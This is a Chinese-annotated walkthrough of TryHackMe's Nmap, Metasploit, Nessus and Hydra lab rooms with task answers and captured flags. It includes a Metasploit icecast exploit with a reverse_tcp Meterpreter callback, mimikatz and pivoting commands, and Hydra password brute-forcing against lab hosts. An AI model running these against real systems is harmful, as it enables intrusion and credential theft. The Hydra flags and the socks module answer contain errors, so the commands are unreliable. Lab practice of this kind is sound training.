Tryhackme-Pentesting Tools

Pentesting Tools

Nmap

task1 Deploy

Deploy the attached VM

task2 Introduction

1.What networking constructs are used to direct traffic to the right application on a server?

ports

2.How many of these are available on any network-enabled computer?

65535

3.[Research] How many of these are considered “well-known”? (These are the “standard” numbers mentioned in the task)

1024

小于1024的端口号是保留端口号

task3 Nmap Switches

1.What is the first switch listed in the help menu for a ‘Syn Scan’ (more on this later!)?

-sS

-sS – 使用TCP协议SYN进行扫描

2.Which switch would you use for a “UDP scan”?

-sU

-sU – 使用UDP扫描

3.If you wanted to detect which operating system the target is running on, which switch would you use?

-O

-O – 扫描操作系统版本

4.Nmap provides a switch to detect the version of the services running on the target. What is this switch?

-sV

-sV – 扫描运行服务版本

5.The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity?

-v

-V – 输出更详细的信息

6.Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two?
(Note: it’s highly advisable to always use at least this option)

-vv

-vv – 输出第2级详细的信息,-vvv 第三级

7.We should always save the output of our scans – this means that we only need to run the scan once (reducing network traffic and thus chance of detection), and gives us a reference to use when writing reports for clients.

-oA

-oA – 保存.nmap,.xml,.gnmap种主要格式的nmap结果

8.What switch would you use to save the nmap results in a “normal” format?

-oN

-oN – 保存.nmap格式的nmap数据

9.A very useful output format: how would you save results in a “grepable” format?

-oG

-oG – 保存.gnmap格式的nmap扫描结果

10.Sometimes the results we’re getting just aren’t enough. If we don’t care about how loud we are, we can enable “aggressive” mode. This is a shorthand switch that activates service detection, operating system detection, a traceroute and common script scanning.

How would you activate this setting?

-A

-A – 全面扫描,包括操作系统,软件版本,脚本扫描和路由追踪

11.Nmap offers five levels of “timing” template. These are essentially used to increase the speed your scan runs at. Be careful though: higher speeds are noisier, and can incur errors!

How would you set the timing template to level 5?

-T5

-T5 – 使用第5级的速度进行扫描,可选参数1-5.数字越大越快

12.We can also choose which port(s) to scan.

How would you tell nmap to only scan port 80?

-p 80

-p – 指定扫描端口范围

13.How would you tell nmap to scan ports 1000-1500?

-p 1000-1500

14.A very useful option that should not be ignored:

How would you tell nmap to scan all ports?

-p-

-p- – 扫描所有端口

15.How would you activate a script from the nmap scripting library (lots more on this later!)?

–script

使用脚本扫描

16.How would you activate all of the scripts in the “vuln” category?

–script=vuln

–script=vuln – 使用类别为vuln的所有脚本扫描

task4 Scan Types Overview

1.Read the Scan Types Introduction.

task5 Scan Types TCP Connect Scans

1.Which RFC defines the appropriate behaviour for the TCP protocol?

RFC 793

2.If a port is closed, which flag should the server send back to indicate this?

RST

正常TCP扫描会发送SYN包完成三次握手建立TCP确定端口开放.如果端口关闭会发送RST(重置)响应包.

task6 Scan Types SYN Scans

1.There are two other names for a SYN scan, what are they?

Half-open Stealth

-sS 也被称为Half-open(半开) scans, or Stealth(隐形) scans

2.Can Nmap use a SYN scan without Sudo permissions (Y/N)?

n

使用-sS 需要用户有root权限

task7 Scan Types UDP Scans

1.If a UDP port doesn’t respond to an Nmap scan, what will it be marked as?

open|filtered

2.When a UDP port is closed, by convention the target should send back a “port unreachable” message. Which protocol would it use to do so?

ICMP

task8 Scan Types NULL, FIN and Xmas

1.Which of the three shown scan types uses the URG flag?

Xmas

2.Why are NULL, FIN and Xmas scans generally used?

firewall evasion

-sN,-sF,-sX 主要用来规避防火墙

3.Which common OS may respond to a NULL, FIN or Xmas scan with a RST for every port?

Microsoft Windows

task9 Scan Types ICMP Network Scanning

1.How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)

nmap -sn 172.16.0.0/16

-sn 使用ICMP进行扫描

task10 NSE Scripts Overview

1.What language are NSE scripts written in?

lua

NSE scripts使用lua编写

2.Which category of scripts would be a very bad idea to run in a production environment?

intrusive

task11 NSE Scripts Working with the NSE

1.What optional argument can the ftp-anon.nse script take?

maxlist

–script-help 脚本名 – 查询脚本参数

task12 NSE Scripts Searching for Scripts

1.Search for “smb” scripts in the /usr/share/nmap/scripts/ directory using either of the demonstrated methods.
What is the filename of the script which determines the underlying OS of the SMB server?

smb-os-discovery.nse

nmap脚本位于/usr/share/nmap/scripts/

2.Read through this script. What does it depend on?

smb-brute

task13 Firewall Evasion

1.Which simple (and frequently relied upon) protocol is often blocked, requiring the use of the -Pn switch?

ICMP

2.[Research] Which Nmap switch allows you to append an arbitrary length of random data to the end of packets?

–data-length

–data-length – 将任意长度的随机数据附加到数据包末尾

task14 Practical

1.Does the target (10.10.229.236)respond to ICMP (ping) requests (Y/N)?

N

机器无法ping通

2.Perform an Xmas scan on the first 999 ports of the target – how many ports are shown to be open or filtered?

999

3.There is a reason given for this – what is it?

Note: The answer will be in your scan results. Think carefully about which switches to use – and read the hint before asking for help!

no responses

4.Perform a TCP SYN scan on the first 5000 ports of the target – how many ports are shown to be open?

5

5.Open Wireshark (see Cryillic’s Wireshark Room for instructions) and perform a TCP Connect scan against port 80 on the target, monitoring the results. Make sure you understand what’s going on.

6.Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? (Y/N)

y

task15 Conclusion

1.Read the conclusion.

Metasploit

Task1 Intro

Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository.

Task2 Initializing…

1.First things first, we need to initialize the database! Let’s do that now with the command:
If you’re using the AttackBox, you don’t need to do this.msfdb init

2.Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h

3.We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-’

-q

-q, --quiet Do not print the banner on startup

4.Once the database is initialized, go ahead and start Metasploit via the command: msfconsole

5.After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status

6.Cool! We’ve connected to the database, which type of database does Metasploit 5 use?

postgresql

Task3 Rock 'em to the Core [Commands]

1.Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help

2.The help menu has a very short one-character alias, what is it?

?

3.Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?

search

4.Once we’ve found the module we want to leverage, what command we use to select it as the active module?

use

5.How about if we want to view information about either a specific module or just the active one we have selected?

info

6.Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?

connect

7.Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?

banner

8.We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?

set

9.Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?

setg

10.Now that we’ve learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.

get

11.How about changing the value of a variable to null/no value?

unset

12.When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?

spool

spool将控制台输出保存到文件

13.Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.

save

Task4 Modules for Every Occasion!

1.Easily the most common module utilized, which module holds all of the exploit code we will use?

exploit

2.Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?

payload

3.Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.

Auxiliary

4.One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?

POST

5.Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?

Encoder

6.Last but not least, which module is used with buffer overflow and ROP attacks?

NOP

7.Not every module is loaded in by default, what command can we use to load different modules?

load

*Note, this diagram includes both the interfaces and *most* of the modules. This diagram does not include the ‘Post’ module.

Task5 Move that shell!

1.Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command db_nmap -sV MACHINE_IP

2.What service does nmap identify running on port 135?

msrpc

3.Let’s go ahead and see what information we have collected in the database. Try typing the command into the msfconsole now.hosts

4.How about something else from the database, try the command now.services

5.One last thing, try the command now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully. vulns

6.Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type followed by a unique string found within only the target exploit. For example, try this out now with the following command . What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the startuse``use icecast

exploit/windows/http/icecast_header

7.While that use command with the unique string can be incredibly useful that’s not quite the exploit we want here. Let’s now run the command . search multi/handler

Go ahead and run the command wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.use NUMBER_NEXT_TO exploit/multi/handler

---

What is the name of the column on the far left side of the console that shows up next to ‘Name’?

8.Now type the command . This is the short way to use modules returned by search results. use NUMBER_FROM_PREVIOUS_QUESTION

9.Next, let’s set the payload using this command . In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command . You might have to check your IP using the command , it will likely be your tun0 interface.set PAYLOAD windows/meterpreter/reverse_tcp``set LHOST YOUR_IP_ON_TRYHACKME``ip addr

10.Let’s go ahead and return to our previous exploit, run the command to select it again.use icecast

11.One last step before we can run our exploit. Run the command to tell Metasploit which target to attack. set RHOSTS MACHINE_IP

12.Once you’re set those variables correctly, run the exploit now via either the command or the command to run this as a job.exploit``run -j

13.Once we’ve started this, we can check all of the jobs running on the system by running the command jobs

14.After we’ve established our connection in the next task, we can list all of our sessions using the command . Similarly, we can interact with a target session using the command sessions``sessions -i SESSION_NUMBER

Task6 We’re in, now what?

1.First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command . What’s the name of the spool service? ps

spoolsv.exe

2.Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!

migrate

migrate <pid值> #将Meterpreter会话移植到指定pid值进程中

3.Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?

getuid

4.How about finding more information out about the system itself?

sysinfo

5.This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?

load kiwi

6.Let’s go ahead and figure out the privileges of our current user, what command do we run?

getprivs

7.What command do we run to transfer files to our victim computer?

upload

8.How about if we want to run a Metasploit module?

run

9.A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?

ipconfig

10.Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command run . This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.post/windows/gather/checkvm

11.Next, let’s try: . This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room Ice.run post/multi/recon/local_exploit_suggester

12.Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: run post/windows/manage/enable_rdp

13.One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?

shell

shell – 在会话中生成shell

Task7 Makin’ Cisco Proud

1.Let’s go ahead and run the command , this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the flag in your answer.run autoroute -h``-n

run autoroute -s 172.18.1.0 255.255.255.0

2.Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command . What is the full path to the socks5 auxiliary module?search server/socks5

auxiliary/server/socks4a

3.Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?

– proxychains

Nessus

task1 Introduction

I have read the description!

task2 Installation

1.Goto https://www.tenable.com/products/nessus/nessus-essentials and register an account.

You will need to do this for an activation code.

2.We will then download the Nessus-#.##.#-debian6_**amd64.**deb file

Save it to your /Downloads/ folder

3.In the terminal we will navigate to that folder and run the following command:

sudo dpkg -i package_file.deb

Remember to replace package_file.deb with the file name you downloaded.

4.We will now start the Nessus Service with the command:

sudo /bin/systemctl start nessusd.service

5.Open up Firefox and goto the following URL:

https://localhost:8834/

You may be prompted with a security risk alert.

Click Advanced… -> Accept the Risk and Continue’’

6.Next, we will set up the scanner.

Select the option Nessus Essentials

Clicking the Skip button will bring us to a page, which we will input that code we got in the email from Nessus.

7.Fill out the Username and Password fields. Make sure to use a strong password!

8.Nessus will now install the plugins required for it to function.

This will take some time, which will depend on your internet connection and the hardware attached to your VM.

If the progress bar appears to be not moving, it means you do not have enough space on the VM to install.

9.Log in with the account credentials you made earlier.

10.You have now successfully installed Nessus!

task3 Navigation and Scans

1.What is the name of the button which is used to launch a scan?

New Scan

2.What side menu option allows us to create custom templates?

Policies

3.What menu allows us to change plugin properties such as hiding them or changing their severity?

Plugin Rules

4.In the ‘Scan Templates’ section after clicking on ‘New Scan’, what scan allows us to see simply what hosts are alive?

Host Discovery

5.One of the most useful scan types, which is considered to be ‘suitable for any host’?

Basic Network Scan

6.What scan allows you to ‘Authenticate to hosts and enumerate missing updates’?

Credentialed Patch Audit

7.What scan is specifically used for scanning Web Applications?

Web Application Tests

task4 Scanning!

1.Create a new ‘Basic Network Scan’ targeting the deployed VM. What option can we set under ‘BASIC’ (on the left) to set a time for this scan to run? This can be very useful when network congestion is an issue.

Schedule

2.Under ‘DISCOVERY’ (on the left) set the ‘Scan Type’ to cover ports 1-65535. What is this type called?

Port scan(all ports)

3.What ‘Scan Type’ can we change to under ‘ADVANCED’ for lower bandwidth connection?

Scan low bandwidth links

4.With these options set, launch the scan.

5.After the scan completes, which ‘Vulnerability’ in the ‘Port scanners’ family can we view the details of to see the open ports on this host?

Nessus SYN Scanner

6.What Apache HTTP Server Version is reported by Nessus?

2.4.99

task5 Scanning a Web Application!

1.What is the plugin id of the plugin that determines the HTTP server type and version?

10107

2.What authentication page is discovered by the scanner that transmits credentials in cleartext?

login.php

3.What is the file extension of the config backup?

.bak

4.Which directory contains example documents? (This will be in a php directory)

/external/phpids/0.6/docs/examples/

5.What vulnerability is this application susceptible to that is associated with X-Frame-Options?

Clickjacking

Hydra

task1 Hydra Introduction

Read the above and have Hydra at the ready.

task2 Using Hydra

1.Use Hydra to bruteforce molly’s web password. What is flag 1?

THM{2673a7dd116de68e85c48ec0b1f2612e}

hydra -l molly -p /usr/share/wordlists/rockyou.txt 10.10.118.73 http-post-form "/login:user=^USER^&password=^PASS^:F=incorrect"-V

2.Use Hydra to bruteforce molly’s SSH password. What is flag 2?

THM{c8eeb0468febbadea859baeb33b2541b}

hydra -l molly -p /usr/share/wordlists/rockyou.txt 10.10.118.73 -t 4 ssh